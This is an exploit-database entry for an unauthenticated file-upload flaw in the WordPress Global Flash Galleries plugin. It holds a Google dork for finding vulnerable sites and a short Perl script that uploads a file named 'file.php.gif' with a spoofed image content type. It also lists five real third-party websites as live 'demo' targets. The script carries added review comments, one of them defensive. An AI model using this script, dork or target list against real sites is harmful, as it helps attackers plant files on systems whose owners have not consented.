WordPress Global Flash Galleries File Upload



EKU-ID: 3771 CVE: OSVDB-ID:
Author: Ashiyane Digital Security Team Published: 2014-01-21 Verified: Verified



###############################################################
# Exploit Title: WordPress global-flash-galleries Plugin Remote File
Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 01/18/2014
# Vendor Homepage: http://wordpress.org
# Software Link :
http://downloads.wordpress.org/plugin/global-flash-galleries.zip
# Google dork: inurl:/wp-content/plugins/global-flash-galleries/
# Tested on: Windows/Linux
###############################################################

# Description :
	Global-Flash Galleries allows file upload by unauthenticated users. The filters in
	place only permit uploads of image files (extensions .gif, .png and .jpg).
	This avoids script execution problems, but an
	attacker could use the affected system to host files.

The vulnerability is due to inappropriate cookie validation in:
/global-flash-galleries/swfupload.php
	
	
# Exploit :
= = = = = = = = =
[Perl]
	#! /usr/bin/perl
	# Sends one multipart/form-data POST to the URL given as the first
	# argument, attaching the local file given as the second argument
	# under the form field "Filedata".  Prints the response body when the
	# server answers with a success status, otherwise the HTTP status line.
	# NOTE(review): no `use strict`/`use warnings`; the script does not
	# check that both arguments were supplied.
	use LWP;
	use HTTP::Request::Common;
	
	# Positional arguments: the URL to post to, and a local file path.
	my ($url, $file) = @ARGV;
	
	my $ua = LWP::UserAgent->new();
	# HTTP::Request::Common::POST with Content_Type 'form-data' builds a
	# multipart/form-data body from the key/value list below.
	my $req = POST $url,
		Content_Type => 'form-data',
		Content =>    [
	name => $name, # `$name` is never assigned anywhere in this script
	galleryselect => 1, # Gallery ID (popup.php)
	# File part: the declared filename is "file.php.gif" and the declared
	# part Content-Type is image/gif, regardless of the real file's bytes.
	# From a defender's view, a double extension and a client-supplied
	# Content-Type that is not verified against the content are exactly
	# what an upload handler must validate server-side and log.
	Filedata => [ "$file", "file.php.gif",  Content_Type =>
	'image/gif' ]
						];
	my $res = $ua->request( $req );
	# is_success covers 2xx responses; anything else prints the status line.
	if( $res->is_success ) {
		print $res->content;
	} else {
		print $res->status_line, "\n";
	}
[Perl]

# Exploit demo :
= = = = = = = = =
http://radiostan.fm/wp-content/plugins/global-flash-galleries/swfupload.php
http://izhairstudio.ca/wp-content/plugins/global-flash-galleries/swfupload.php
http://awb.usahidsolo.ac.id/wp-content/plugins/global-flash-galleries/swfupload.php
http://minigolfcourseulles.fr/wp-content/plugins/global-flash-galleries//swfupload.php
http://madiro-hotel.com/wp-content/plugins/global-flash-galleries/swfupload.php

# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# Special Tnx to V1R4N64R ,C4T,HAMIDx9
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #